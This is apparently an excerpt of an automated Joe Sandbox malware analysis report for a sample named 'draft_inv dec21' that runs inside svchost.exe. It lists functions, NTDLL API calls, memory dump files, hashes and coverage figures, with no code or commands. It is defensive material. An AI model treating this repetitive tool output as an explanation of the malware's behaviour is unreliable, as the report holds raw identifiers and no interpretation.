RtlDebugPrintTimes.NTDLL ref: 1E935C0F
RtlDebugPrintTimes.NTDLL ref: 1E935C31
RtlDebugPrintTimes.NTDLL ref: 1E935C3E

Strings

Wow64 Emulation Layer, xrefs: 1E935C09

Memory Dump Source

Source File: 00000008.00000002.6930162920.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true

Associated: 00000008.00000002.6931777529.000000001E9A9000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.6931812481.000000001E9AD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e880000_draft_inv dec21.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Wow64 Emulation Layer
API String ID: 3446177414-921169906
Opcode ID: 8a9779b77936d709f7e80b663a36317e8bba99cd6da6e7207084c04f89fd1fde
Instruction ID: bc3b4e6b1089beb7e32d916fe1d3c012bcd337d921a61a98c7cccc1e2e8e0d6b
Opcode Fuzzy Hash: 8a9779b77936d709f7e80b663a36317e8bba99cd6da6e7207084c04f89fd1fde
Instruction Fuzzy Hash: 7321F7B990015DBFEB029BA48D84DFF7B7DFF49299B140654FA01A2240EB30EE01DB60

Uniqueness

Uniqueness Score: -1.00%

Function 1E98A04A, Relevance: 6.2, APIs: 4, Instructions: 170timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1E98A0F7
RtlDebugPrintTimes.NTDLL ref: 1E98A1AA
RtlDebugPrintTimes.NTDLL ref: 1E98A1CE
RtlDebugPrintTimes.NTDLL ref: 1E98A1E3

Memory Dump Source

Source File: 00000008.00000002.6930162920.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true

Associated: 00000008.00000002.6931777529.000000001E9A9000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.6931812481.000000001E9AD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e880000_draft_inv dec21.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 97b14d3bf8f0da33b18e068f35ef6cc6a1af7ae86a5991a0935e4b96c11cc701
Instruction ID: 10a79a7269905eea22202fb4548abb4920e13e959e3ffc25b23b305d866aa4bf
Opcode Fuzzy Hash: 97b14d3bf8f0da33b18e068f35ef6cc6a1af7ae86a5991a0935e4b96c11cc701
Instruction Fuzzy Hash: 3A519A7471461A9FDB49CE19C8A0E19B3E6FF8A310B144A6DD906CB724DBB9EC41CF80

Uniqueness

Uniqueness Score: -1.00%

Function 1E92EE56, Relevance: 6.2, APIs: 4, Instructions: 150timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1E92EEED
RtlDebugPrintTimes.NTDLL ref: 1E92EF12
RtlDebugPrintTimes.NTDLL ref: 1E92EFA4
RtlDebugPrintTimes.NTDLL ref: 1E92EFF8

Memory Dump Source

Source File: 00000008.00000002.6930162920.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true

Associated: 00000008.00000002.6931777529.000000001E9A9000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.6931812481.000000001E9AD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e880000_draft_inv dec21.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 6e903f89d774a8e7cdcdf6ba1127171fa02f3473f6a769eafb0723191d390889
Instruction ID: 8e0748d64d182366c6a5ca62509513fac4986041ce5f299f19474a673048847f
Opcode Fuzzy Hash: 6e903f89d774a8e7cdcdf6ba1127171fa02f3473f6a769eafb0723191d390889
Instruction Fuzzy Hash: B55132B2E1121A9FDF09CF95D880AEDBBB6BF88314F04822EE805BB254D7359940CF54

Uniqueness

Uniqueness Score: -1.00%

Function 1E8E7A4F, Relevance: 6.1, APIs: 4, Instructions: 81timethreadCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1E8E7A72
BaseThreadInitThunk.KERNEL32 ref: 1E8E7A7C
RtlDebugPrintTimes.NTDLL ref: 1E9247F8
RtlDebugPrintTimes.NTDLL ref: 1E92487B

Memory Dump Source

Source File: 00000008.00000002.6930162920.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true

Associated: 00000008.00000002.6931777529.000000001E9A9000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.6931812481.000000001E9AD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e880000_draft_inv dec21.jbxd

Similarity

API ID: DebugPrintTimes$BaseInitThreadThunk
String ID:
API String ID: 4281723722-0
Opcode ID: a2b15276379ff87db1f2cf78fb4121e57a2f57ce2a9624a55964062a90362271
Instruction ID: b198efc23697de7da5c5f3158354c0751314f573068ce5749adddb57e1a544b2
Opcode Fuzzy Hash: a2b15276379ff87db1f2cf78fb4121e57a2f57ce2a9624a55964062a90362271
Instruction Fuzzy Hash: 2F31E279E14269EFCF15DFA8D884A9DBBB1BF88720F10462AE511B7294D7355900CF90

Uniqueness

Uniqueness Score: -1.00%

Function 1E8B58E0, Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 494COMMON

Download Yara Rule

Strings

@, xrefs: 1E9108AE

Memory Dump Source

Source File: 00000008.00000002.6930162920.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true

Associated: 00000008.00000002.6931777529.000000001E9A9000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.6931812481.000000001E9AD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e880000_draft_inv dec21.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 0906a1972aaf8fcfcf51c48ba8caa364c05fc321963dcc55275830f10349ae8a
Instruction ID: acf76b2e07ccf47a08d1daa09b3de710dd2e71b7ca9a6eb1219dade3d095b5f2
Opcode Fuzzy Hash: 0906a1972aaf8fcfcf51c48ba8caa364c05fc321963dcc55275830f10349ae8a
Instruction Fuzzy Hash: 8A324674D142AACFDB21CF69C844BDDBBB6BB08304F0446E9D449A7391D775AA84CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 1E8E4B79, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON

Download Yara Rule

Strings

0, xrefs: 1E8E4BE3
Flst, xrefs: 1E8E4BB6

Memory Dump Source

Source File: 00000008.00000002.6930162920.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true

Associated: 00000008.00000002.6931777529.000000001E9A9000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.6931812481.000000001E9AD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e880000_draft_inv dec21.jbxd

Similarity

API ID:
String ID: 0$Flst
API String ID: 0-758220159
Opcode ID: f3ab83caccc48749af72545d14d412eaef2d758060ca0ebd567592f266a8fdfc
Instruction ID: 4a34c8c51880db264d4ad472193fb63e75de21af0e0629e119e44ccb73a3efb7
Opcode Fuzzy Hash: f3ab83caccc48749af72545d14d412eaef2d758060ca0ebd567592f266a8fdfc
Instruction Fuzzy Hash: AC51CCB1E1068A8FCB11CF99C48475DFBF6EF85714F54C62ED4499B688E7B09981CB80

Uniqueness

Uniqueness Score: -1.00%

Function 1E8B0485, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 135timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1E8B05D6

Strings

kLsE, xrefs: 1E8B05FE
TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 1E8B0586

Memory Dump Source

Source File: 00000008.00000002.6930162920.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true

Associated: 00000008.00000002.6931777529.000000001E9A9000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.6931812481.000000001E9AD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e880000_draft_inv dec21.jbxd

Similarity

API ID: DebugPrintTimes
String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
API String ID: 3446177414-2547482624
Opcode ID: 4c9b1930d407524ce5d7e75e5ede1a0a9b05738ad0fa10574640257d1f718216
Instruction ID: 520aa1bc67232efbc796ce0e24342776ac1376ec7a2ae064a2977389b5560793
Opcode Fuzzy Hash: 4c9b1930d407524ce5d7e75e5ede1a0a9b05738ad0fa10574640257d1f718216
Instruction Fuzzy Hash: C351D1B5A0078ADFDB24DFA9C4406EBB7F9AF44300F004A3ED5A597740E730A546CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 1E8ADF21, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1E8ADFE0

Strings

0, xrefs: 1E8ADFC0
0, xrefs: 1E8ADFAB

Memory Dump Source

Source File: 00000008.00000002.6930162920.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true

Associated: 00000008.00000002.6931777529.000000001E9A9000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.6931812481.000000001E9AD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e880000_draft_inv dec21.jbxd

Similarity

API ID: DebugPrintTimes
String ID: 0$0
API String ID: 3446177414-203156872
Opcode ID: 564028cbeb4164221c0f68326661a71f3c1e9e63538209fdf7396bc3aac9230b
Instruction ID: 0e1a7a5f8e39c93208e956d95e0097eb3e309448b68dd43667f3a77321da4b14
Opcode Fuzzy Hash: 564028cbeb4164221c0f68326661a71f3c1e9e63538209fdf7396bc3aac9230b
Instruction Fuzzy Hash: 7E414CB16087469FC300CF29C484A5BBBE5BF89318F044A6EF588DB381D771EA45CB96

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: svchost.exe PID: 1340 Parent PID: 4580 svchost.exeCOMMON

Execution Graph

Execution Coverage:	1.9%
Dynamic/Decrypted Code Coverage:	1.8%
Signature Coverage:	0%
Total number of Nodes:	772
Total number of Limit Nodes:	84

Executed Functions

Function 02D985E0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,02D93BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02D93BB7,007A002E,00000000,00000060,00000000,00000000), ref: 02D9862D

Strings

.z`, xrefs: 02D9861D, 02D98628

Memory Dump Source

Source File: 0000000B.00000002.11085185929.0000000002D80000.00000040.00020000.sdmp, Offset: 02D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2d80000_svchost.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: a2898a34e09785d489d426ea69e7690cbbd1c11aef83d4c3aa65beebc4a877bd
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: 41F0B2B2204208ABCB08CF88DC94EEB77ADAF8C754F158248FA0D97240C630E811CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 02D98690, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(02D93D72,5E972F65,FFFFFFFF,02D93A31,?,?,02D93D72,?,02D93A31,FFFFFFFF,5E972F65,02D93D72,?,00000000), ref: 02D986D5

Memory Dump Source

Source File: 0000000B.00000002.11085185929.0000000002D80000.00000040.00020000.sdmp, Offset: 02D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2d80000_svchost.jbxd

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: 0aa8c127e6254c9eee7507d2b7ad7ad8860ee6e42e5fc988b17910a25b6aedb4
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: A5F0A4B2200208ABCB14DF89DC94EEB77ADEF8C754F158248BA1DA7251D630E911CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02D9868D, Relevance: 1.5, APIs: 1, Instructions: 33filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(02D93D72,5E972F65,FFFFFFFF,02D93A31,?,?,02D93D72,?,02D93A31,FFFFFFFF,5E972F65,02D93D72,?,00000000), ref: 02D986D5

Memory Dump Source

Source File: 0000000B.00000002.11085185929.0000000002D80000.00000040.00020000.sdmp, Offset: 02D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2d80000_svchost.jbxd

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 894451518b03425b5f96cb665bb015821518830248b6bef362a5c2ab4153df95
Instruction ID: 192e8697e2a410fe389662909d13f1c52e63d13493e946801aeddb42bd33676c
Opcode Fuzzy Hash: 894451518b03425b5f96cb665bb015821518830248b6bef362a5c2ab4153df95
Instruction Fuzzy Hash: F8F017B6204048ABCB04DF98D890CEB77ADFF8C354B15828DFA1CA7211C630E855CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02D987C0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02D82D11,00002000,00003000,00000004), ref: 02D987F9

Memory Dump Source

Source File: 0000000B.00000002.11085185929.0000000002D80000.00000040.00020000.sdmp, Offset: 02D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2d80000_svchost.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction ID: 36cb08480e029f3eb7cbbfb8c6eb7a968593eea215b1007986327e95573ca72e
Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction Fuzzy Hash: B2F015B2200208ABCB14DF89CC80EEB77ADEF88750F118148FE08A7241C630F910CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 02D987C2, Relevance: 1.5, APIs: 1, Instructions: 29memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02D82D11,00002000,00003000,00000004), ref: 02D987F9

Memory Dump Source

Source File: 0000000B.00000002.11085185929.0000000002D80000.00000040.00020000.sdmp, Offset: 02D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2d80000_svchost.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b7b15b99fa607431c14642596bc06a23face6b8274340ec77040ea26b9abdcb3
Instruction ID: 629a194a083f02e17c6a99d35117f2e0be6d3ff65c7a87b22cf3b7dc1895a9bd
Opcode Fuzzy Hash: b7b15b99fa607431c14642596bc06a23face6b8274340ec77040ea26b9abdcb3
Instruction Fuzzy Hash: DBF015B2200108AFCB14DF88CC80EEB77A9EF88350F118248FA08A7240C630E911CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02D9870A, Relevance: 1.5, APIs: 1, Instructions: 23nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(02D93D50,?,?,02D93D50,00000000,FFFFFFFF), ref: 02D98735

Memory Dump Source

Source File: 0000000B.00000002.11085185929.0000000002D80000.00000040.00020000.sdmp, Offset: 02D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2d80000_svchost.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 018cb176b172d783d48d9f0d354cb53a4ba3811f890f0fcac36f657c00b585a6
Instruction ID: 165f97507e116a1f3e14dfa4dcd4444e4bb7401aa9cbab1b3285f6be4b782f78
Opcode Fuzzy Hash: 018cb176b172d783d48d9f0d354cb53a4ba3811f890f0fcac36f657c00b585a6
Instruction Fuzzy Hash: 03E04631600214ABDB20DFA4CC86EEB7B6AEF44360F144159F909EB682C630E610CAE0

Uniqueness

Uniqueness Score: -1.00%

Function 02D98710, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(02D93D50,?,?,02D93D50,00000000,FFFFFFFF), ref: 02D98735

Memory Dump Source

Source File: 0000000B.00000002.11085185929.0000000002D80000.00000040.00020000.sdmp, Offset: 02D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2d80000_svchost.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: 9694885d6a9d9ee87ed527005513be1c3f0f5e73bdfcc2f7dde543bf786cbbcd
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: 5FD012752002146BD710EBD8CC45ED7775DEF44750F154459BA185B241C530FA00CAE0

Uniqueness

Uniqueness Score: -1.00%

Function 03B734E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03B734EA

Memory Dump Source

Source File: 0000000B.00000002.11090669894.0000000003B00000.00000040.00000001.sdmp, Offset: 03B00000, based on PE: true

Associated: 0000000B.00000002.11092177690.0000000003C29000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.11092255900.0000000003C2D000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3b00000_svchost.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: abdb3cebcd0decc982a4cf9f6419b675f0fd126b28414157b2192ed16af27896
Instruction ID: a3a1f86a5d26a8fd161ec78dd83c6c516b33638992391e67cb47015b3aa3c363
Opcode Fuzzy Hash: abdb3cebcd0decc982a4cf9f6419b675f0fd126b28414157b2192ed16af27896
Instruction Fuzzy Hash: 9F90023260510843D500B3584614706100587D0205FA1CC65A0418568DD7A5C951B5A2

Uniqueness

Uniqueness Score: -1.00%

Function 03B72B90, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03B72B9A

Memory Dump Source

Source File: 0000000B.00000002.11090669894.0000000003B00000.00000040.00000001.sdmp, Offset: 03B00000, based on PE: true

Associated: 0000000B.00000002.11092177690.0000000003C29000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.11092255900.0000000003C2D000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3b00000_svchost.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: dd9ad99434536278989f0e8dbcfacfe226e36c1f0ca3dc3974a86ccd98204319
Instruction ID: 62623ab221dac16084b58e6f6d258a5c0f5a5f3b0b9c64d851834e695777c2ba
Opcode Fuzzy Hash: dd9ad99434536278989f0e8dbcfacfe226e36c1f0ca3dc3974a86ccd98204319
Instruction Fuzzy Hash: 5590023220108C43D510B358850474A000587D0305F95CC65A4418658DD7A5C891B121

Uniqueness

Uniqueness Score: -1.00%

Function 03B72B80, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03B72B8A

Memory Dump Source

Source File: 0000000B.00000002.11090669894.0000000003B00000.00000040.00000001.sdmp, Offset: 03B00000, based on PE: true

Associated: 0000000B.00000002.11092177690.0000000003C29000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.11092255900.0000000003C2D000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3b00000_svchost.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4aa340ad8bc614830c3a694e2a9055262bc5a14cd99ffb2f4cbc306d8c02d6e5
Instruction ID: 35f60c68b8a12d449f6e5324953f790ff656649540f60d151e21582fd14c5fe8
Opcode Fuzzy Hash: 4aa340ad8bc614830c3a694e2a9055262bc5a14cd99ffb2f4cbc306d8c02d6e5
Instruction Fuzzy Hash: 3D90023220100C83D500B3584504B46000587E0305F91C86AA0118654DD725C851B521

Uniqueness

Uniqueness Score: -1.00%

Function 03B72BC0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03B72BCA

Memory Dump Source

Source File: 0000000B.00000002.11090669894.0000000003B00000.00000040.00000001.sdmp, Offset: 03B00000, based on PE: true

Associated: 0000000B.00000002.11092177690.0000000003C29000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.11092255900.0000000003C2D000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3b00000_svchost.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 96da8d05e5d2ccef065eec2d0f7325f4250565478e305f188fce0bd9e91acbd5
Instruction ID: 398978e8c44c1a2a326afa4709fcc91ec97052ba8ba9a6d19d3ec5e99122bdbf
Opcode Fuzzy Hash: 96da8d05e5d2ccef065eec2d0f7325f4250565478e305f188fce0bd9e91acbd5
Instruction Fuzzy Hash: CC90023220100843D500B7985508646000587E0305F91D865A5018555ED775C891B131

Uniqueness

Uniqueness Score: -1.00%

Function 03B72B10, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03B72B1A

Memory Dump Source

Source File: 0000000B.00000002.11090669894.0000000003B00000.00000040.00000001.sdmp, Offset: 03B00000, based on PE: true

Associated: 0000000B.00000002.11092177690.0000000003C29000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.11092255900.0000000003C2D000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3b00000_svchost.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ccf2fb61ad1f5e1181c4eec1eee6853a60a9fa0ef9bd9f346b20303797354ef4
Instruction ID: 371a29c8f3f05db0ab838f4b4c8b237010c3a02a93d43ee557ec15ae4d7a1323
Opcode Fuzzy Hash: ccf2fb61ad1f5e1181c4eec1eee6853a60a9fa0ef9bd9f346b20303797354ef4
Instruction Fuzzy Hash: DB90023220100C43D580B358450464A000587D1305FD1C869A0019654DDB25CA59B7A1

Uniqueness

Uniqueness Score: -1.00%

Function 03B72B00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03B72B0A

Memory Dump Source

Source File: 0000000B.00000002.11090669894.0000000003B00000.00000040.00000001.sdmp, Offset: 03B00000, based on PE: true

Associated: 0000000B.00000002.11092177690.0000000003C29000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.11092255900.0000000003C2D000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3b00000_svchost.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5bbb60b6d0ee5692781f363f0340e8702e068b4853534afcfee4506d3dc35c7a
Instruction ID: 67fbb4082f9d32f4a4610501deefeb4d97ae268d8c9d3c12581a6a5ca1df7297
Opcode Fuzzy Hash: 5bbb60b6d0ee5692781f363f0340e8702e068b4853534afcfee4506d3dc35c7a
Instruction Fuzzy Hash: 0C90023220504C83D540B3584504A46001587D0309F91C865A0058694DE735CD55F661

Uniqueness

Uniqueness Score: -1.00%

Function 03B72A80, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03B72A8A

Memory Dump Source

Source File: 0000000B.00000002.11090669894.0000000003B00000.00000040.00000001.sdmp, Offset: 03B00000, based on PE: true

Associated: 0000000B.00000002.11092177690.0000000003C29000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.11092255900.0000000003C2D000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3b00000_svchost.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6e8c19f42552ee1cc4cd7176e9eeefafa67e2b577da807f3cc48dc7deaf12613
Instruction ID: 9c543a002be774894ee60991fe729bdabf2a336f0fc67ed460ad1d53e5cc658a
Opcode Fuzzy Hash: 6e8c19f42552ee1cc4cd7176e9eeefafa67e2b577da807f3cc48dc7deaf12613
Instruction Fuzzy Hash: 9F900262202004434505B3584514616400A87E0205B91C875E1008590DD635C891B125

Uniqueness

Uniqueness Score: -1.00%

Function 03B729F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03B729FA

Memory Dump Source

Source File: 0000000B.00000002.11090669894.0000000003B00000.00000040.00000001.sdmp, Offset: 03B00000, based on PE: true

Associated: 0000000B.00000002.11092177690.0000000003C29000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.11092255900.0000000003C2D000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3b00000_svchost.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9773a3248d645897d17194096f8daf32999392df747e9c5a7b7e72ffa41b9a86
Instruction ID: 3d35e60fb26d09a440a57b806c300c9a44da04212cafc85b36fb1b54fca57cf3
Opcode Fuzzy Hash: 9773a3248d645897d17194096f8daf32999392df747e9c5a7b7e72ffa41b9a86
Instruction Fuzzy Hash: E7900226211004430505F7580704507004687D5355391C875F1009550CE731C861A121

Uniqueness

Uniqueness Score: -1.00%

Function 03B72F00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03B72F0A

Memory Dump Source

Source File: 0000000B.00000002.11090669894.0000000003B00000.00000040.00000001.sdmp, Offset: 03B00000, based on PE: true

Associated: 0000000B.00000002.11092177690.0000000003C29000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.11092255900.0000000003C2D000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3b00000_svchost.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2585efe1f55d7e6f110778a0104a3933f2aa68ceb31d9b18c082187596faf2da
Instruction ID: 19f72a3a7d4a5798aff65403e611280e76e5d376a9ae5b1c822474bcc890463c
Opcode Fuzzy Hash: 2585efe1f55d7e6f110778a0104a3933f2aa68ceb31d9b18c082187596faf2da
Instruction Fuzzy Hash: 4790022221180483D600B7684D14B07000587D0307F91C969A0148554CDA25C861A521

Uniqueness

Uniqueness Score: -1.00%

Function 03B72E50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03B72E5A

Memory Dump Source

Source File: 0000000B.00000002.11090669894.0000000003B00000.00000040.00000001.sdmp, Offset: 03B00000, based on PE: true

Associated: 0000000B.00000002.11092177690.0000000003C29000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.11092255900.0000000003C2D000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3b00000_svchost.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 265a35fe0bcd50be0a3b3f943a69879cd731e7ea1bb9c8d2659a383e587d686d
Instruction ID: 995eb1f97836162bfd2e4d8057f06232f197a74ad7a674c6db49156951748684
Opcode Fuzzy Hash: 265a35fe0bcd50be0a3b3f943a69879cd731e7ea1bb9c8d2659a383e587d686d
Instruction Fuzzy Hash: 3290026234100883D500B3584514B060005C7E1305F91C869E1058554DD729CC52B126

Uniqueness

Uniqueness Score: -1.00%

Function 03B72DC0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03B72DCA

Memory Dump Source

Source File: 0000000B.00000002.11090669894.0000000003B00000.00000040.00000001.sdmp, Offset: 03B00000, based on PE: true

Associated: 0000000B.00000002.11092177690.0000000003C29000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.11092255900.0000000003C2D000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3b00000_svchost.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e1bd4d2c07a746271a1d83f3b07d151ecb2e3464b5bae392dc4a020d58e63746
Instruction ID: b4c7fb47a6800867299fdc24e7c7b763cb3a1b56caccc35a9f4e7757e7e29350
Opcode Fuzzy Hash: e1bd4d2c07a746271a1d83f3b07d151ecb2e3464b5bae392dc4a020d58e63746
Instruction Fuzzy Hash: E890027220100843D540B3584504746000587D0305F91C865A5058554ED769CDD5B665

Uniqueness

Uniqueness Score: -1.00%

Function 03B72D10, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

